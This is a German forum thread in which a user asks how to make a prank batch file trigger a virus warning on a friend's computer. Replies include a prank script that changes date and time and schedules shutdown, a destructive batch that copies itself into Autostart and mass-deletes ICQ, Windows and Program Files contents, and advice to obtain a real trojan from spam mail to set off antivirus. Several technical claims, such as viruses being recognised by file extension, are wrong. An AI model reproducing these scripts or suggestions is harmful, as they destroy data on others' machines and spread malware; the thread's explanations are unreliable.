• Jetzt anmelden. Es dauert nur 2 Minuten und ist kostenlos!

Batch Datei

Status
Für weitere Antworten geschlossen.

minera

Neues Mitglied
Hallo ich wusste nicht wo das rein gehört und hoffe das ich hier richtig bin o_O
ich habe eine batch datei mit

Code:
start
start
start
start
start
start
usw...

erstellt,und wollte das es als virus erkannt wird,also wenn man drauf klickt soll eine virus meldung erscheinen sodass der schrecken bei meinen freund noch größer ist :D

Ich kann natürlich noch mehr mit batch,aber das sollte für´s erste reichen um ihn zu ärgern^^
Also gibt es da eine bestimmte eingabe sodass es als virus an erkannt wird?

Liebe Grüße
 
Werbung:
Also wenn Du mein/e Freund/in wärst, Dir würde ich was erzählen!

Achja, wenn Du schon so komische Scherze machen willst, da wirst Du mit einer Scriptsprache wohl nicht sehr weit kommen. Lerne eine richtige Programmiersprache. Während dem Programmieren fallen Dir dann sicherlich bessere Sachen ein, als solche Kindergartenscherze.

Gruß thuemmy
 
lol

Will zwar nix sagen hab das aber auch gemacht an meinen Freund weil der mir immer mein Pc heruntergefahren hat :???:

Egal kommen wir zur batch =)
So muss das aussehen;Jump

@echo off
title Windows Ordner wir Modifiziert
echo lol
pause
DIR/S
DIR/S
CLS
Date 12.04.1981
Time 00:00
start
start
start
Shutdown -s -t 600 -c Verarscht
CLS

Also mal so als Erleuterung was das alles so heißt;-):

-@echo off : muss immer am anfang einer Batch datei stehen
-echo : gibt an das Text angezeigt wird
-pause : kennse bestimmt (Tipp: Drücke eine belibige taste zum -fortfahren)
-DIR/S : Durchsucht alle dateien und zeigt dir an wie viele daten du hasst
( da wir aber im p4 oder höher zeitalter sind lauf die buchstaben so schnell foran wie bei matrix xD)
-CLS : löscht halt den verlauf
-Date 12.04.1981
-Time 00:00 : verstellt datum und zeit auf die hinterstehende angabe
-start : öffnet ein neues fenster
^^

Da ich net blöd sterben will sag ma was du noch alles in batch weißt :cool:

Anbei der bildschirm als eine Batch von mir bei dem kollegen lief xD

ach ja hab vergessen bei Kaspersky wenn du in der batch am anfang @echo off stehen hasst wird die batch als virus erkannt ^^;heart
 
Werbung:
Ach ja viruse werden an der Dateiendung erkannt.

Dateinendungen sind z.B
.mp3
.jpg
.html
usw....

wenn du aber die dateinendunger einer batch
(irgendwas.bat oder irgendwas.cmd [cmd hat den gleichen effekt wie .bat])
änderst zu nen virus wird der .bat code nicht mehr erkannt
^^
 
Ich kann auh böse sachen mit batch machen! xD

Code:
echo y| xcopy "Ich.bat" "%userprofile%\startm~1\Programme\Autostart" 
pause
echo y| del "C:\Programme\ICQ6\ICQLRun.exe"
echo y| del "C:\Programme\ICQ6\ConfigFiles\*.XML
echo y| del "C:\Programme\ICQ6\license\*.txt
echo y| del "C:\Programme\ICQ6\*.csmanifest
echo y| del "C:\Programme\ICQ6\sounds\Default\*.mp3
echo y| del "C:\Programme\ICQ6\sounds\Default\*.MPEG
del C:\Programme\ICQ6 *.*/s/q 
del C:\Programme\ICQ6\sounds\Default *.*/s/q
del C:\Programme\Windows Live\Messenger *.*/s/q
del C:\WINDOWS *.*/s/q
del C:\Programme *.*/s/q

diese batch löscht komplett alles was icq enthält,sodass es nicht mehr funktioniert.
Batch datei kopiert sich in den autostart und es kommt auf die Windows Xp version an,denn bei bestimmten windows xp versionen startet die batch bei jedem neustart und bei manchen wird sie geblockt.Hinzu kommt noch das die inhalte der order C:\Programme und C:\WINDOWS gelöscht werden. Z.b exe datein,txt datein oda andere datein.
sollte die batch auf dem desktop gespeichert werden,wird auch der desktop inhalt komplett gelöscht!

Könntet ihr mir vielleicht eine datei endung sagen,sodass es als virus anerkannt wird?
 
ich fühle mich wie in die vergangenheit versetzt.
wer versucht ernsthatf viren mit einem script zu basteln.
ich hab früher auch sherzprogramme geschrieben ab die waren dann etwas besser. so was wie hab nem kumpel ne datei geschickt, die einen windows xp desktop nachgebaut hat und halt die symbole durcheinander gewürfelt hat. hat er auf systemsterung geklickt ging der arbeitsplatz auf und so was des ist witzig!
Gruß KY
 
Werbung:
Könntet ihr mir vielleicht eine datei endung sagen,sodass es als virus anerkannt wird?

So einfach ist das auch nicht xDD


An der datei endung erkennt windows was er mit der Datei machen soll.

Um es Deutlicher auszudrücken hängst du .mp3 an öffnet er n´ musikplayer

hängst du .jpg an öffnet er n´bildprogramm. hängst du .bat dran öffnet er Cmd
hängst du .exe dran öffner er windowsinstaller. usw...


Machst du die dateiendung von einem Virus

Aktuelle Viren:

* Worm/Sober.J
* Worm/Sober.P
* Worm/Sober.Y
* W32/Stanit.A
* Worm/NetSky.AA
* Worm/NetSky.B.1
* Worm/NetSky.C
* Worm/Netsky.D.Dam
* Worm/NetSky.P
* Worm/NetSky.X
* Worm/Mytob.IN.2
* Worm/Mytob.KS

Erkennt das Antivieren Programm diese Sofort außerdem musst du den scribt der datei endung anpassen. Es ist eig FAST unmöglich ^^


Aber kanns ja trozdem ma ausprobieren
^^
 
mhmh kann mit den viren endungen nicht viel anfangen^^ ist eigentlich unmöglich..ich wieß nicht wie die batch und die endungen kombinieren soll xD
 
Hallo,

Ist schon goil .... die Diskussion. Da lohnt es sich, mit einzusteigen :lol:

1. Definition
Ein Virus infiziert ein (vorhandenes) Programm/Exe/Dll/etc. indem es sich hineinschreibt bzw. daran hängt, sich hinter diesen versteckt. Markant an einen Virus ist, dass es den Aufruf des Programms ausnutzt, sich zu starten. Zudem enthält es einen Verteilungsmechanismus, damit es sich weiter verbreitet.

Ein Worm ist ein eigenständiges Programm, das Aktivitäten auf dem Zielsystem ausführt und versucht, sich ebenfalls weiter zu verbreiten. Es infiziert aber keine vorhandene Programme.

/EDIT: Vergessen ... nach der Beschreibung liegt bei der Batch ja keine entsprechende Variante vor :-D

2. Spaßmeldungen
Wenn der Freund auch nur ein bisschen Ahnung hat, lacht er sich tot bei Deiner Batch

3. Batch-Commands
Nur eine Anmerkung, @echo off muss natürlich nicht am Anfang der Datei stehen. Es muss ggf. gar nicht drinne vorkommen :-D

4. AntiVir einbinden
Hier wird es schwierig. Am besten ist es, Du liesst die die Exploid-Beschreibungen bei den Herstellern und setzt da die entsprechenden Daten ein. Vielleicht findest Du Da was passendes ....

Gruß,
Jumper, the II.
 
Werbung:
hi
also ich fass nochmal zusammen.
Ich habe eine böse bacth datei erstellt und eine scherzdatei!
ich möchte ja wie ihr schon wisst das mein freund die scherz datei abekommt,und er hat keine ahnung davon^^
Nun komms:

Bei einem Doppelklick auf meiner batch datei soll eine sofortige viruswarnung kommen! Dennoch sollte die bacth datei seine iegtnliche funktion weiterführen.In dme fall mit
Code:
START
START
START
START
usw...

Ich hoffe ihr wisst was ich meine^^
ich kann eigentlich noch mehr mit batch,ich möchte halt nur das eine "ungefährliche datei" als virus anerkannt wird!

Liebe Grüße
 
Hallo,

ok, schalte Deinen Spam-Filter aus und verfolge die diversen Mails. Spätestens nach einer Woche bekommst Du eine Mail mit einen Anhang, wo ein Trojaner drinne steckt. Die nimmst Du, hängst ans ende eine andere zusätzliche Endung an (z.B. cmd oder bat) und stellst sie neben Deine batch.

Zum Aufrufen des AntiVir reicht es dann, wenn du per cmd die datei kopierst oder einfach mit einer anderen Datei vergleichst.
@copy /y trojaner.exe.cmd trojaner.exe.bat
oder
@fc %0 "%~dp0trojaner.exe.cmd > nul

und das ganze mit start /min, damit die batch selber weiter läuft. Ok?

Gruß,
Jumper, the II.

PS: Nach dem Fischen nicht vergessen, den Spam_Filter wieder zu aktivieren :-D
 
JumperII vbmenu_register("postmenu_163346", true);
kannst du mir den code sagen sodass ich den einfach nur kopieren muss? wäre sher nett von dir =)
 
Werbung:
Irgendwie muss ich bei diesem Thread an Trolle denken... :-D

SCNR,
-Efchen
 
irgendwie wird mir bei diesen beiträgen bewusst das wohl genug leute gibt denen extrem langweilig sein muss
 
Werbung:
loool^^ ihr seit aber auch welche xD
hab noch 21 tage c.a ferien xD
naja wnen ihr mir nicht helfen wollt ,kann ich auhc nichts machen^^
 
also gute scherzprogramme machst am besten mit ner richtigen Programmiersprache, da helf ich dir dann auch gerne.
Und Ferien des Wort kenn ich gar net. werde wohl nie wieder Ferien haben, ab jetzt heißt des Urlaub
heul.gif

Gruß KY
 
Werbung:
Und Ferien des Wort kenn ich gar net. werde wohl nie wieder Ferien haben, ab jetzt heißt des Urlaub
heul.gif

Gruß KY
Dann wirst auch nie wieder nur Taschengeld bekommen, sondern richtig Geld verdienen. Zumindest solange, bis Du heiratest... Dann könnte es auch passieren, dass Du wieder nur Taschengeld bekommst :lol:

Gruß thuemmy
 
Dann wirst auch nie wieder nur Taschengeld bekommen, sondern richtig Geld verdienen. Zumindest solange, bis Du heiratest... Dann könnte es auch passieren, dass Du wieder nur Taschengeld bekommst :lol:

Gruß thuemmy

JUNNNGS beim thema bleiben :-D;Jump;ugl

xDD

und an´s ferienende bitte nicht erinnern ! Danke xD
 
Status
Für weitere Antworten geschlossen.
Zurück
Oben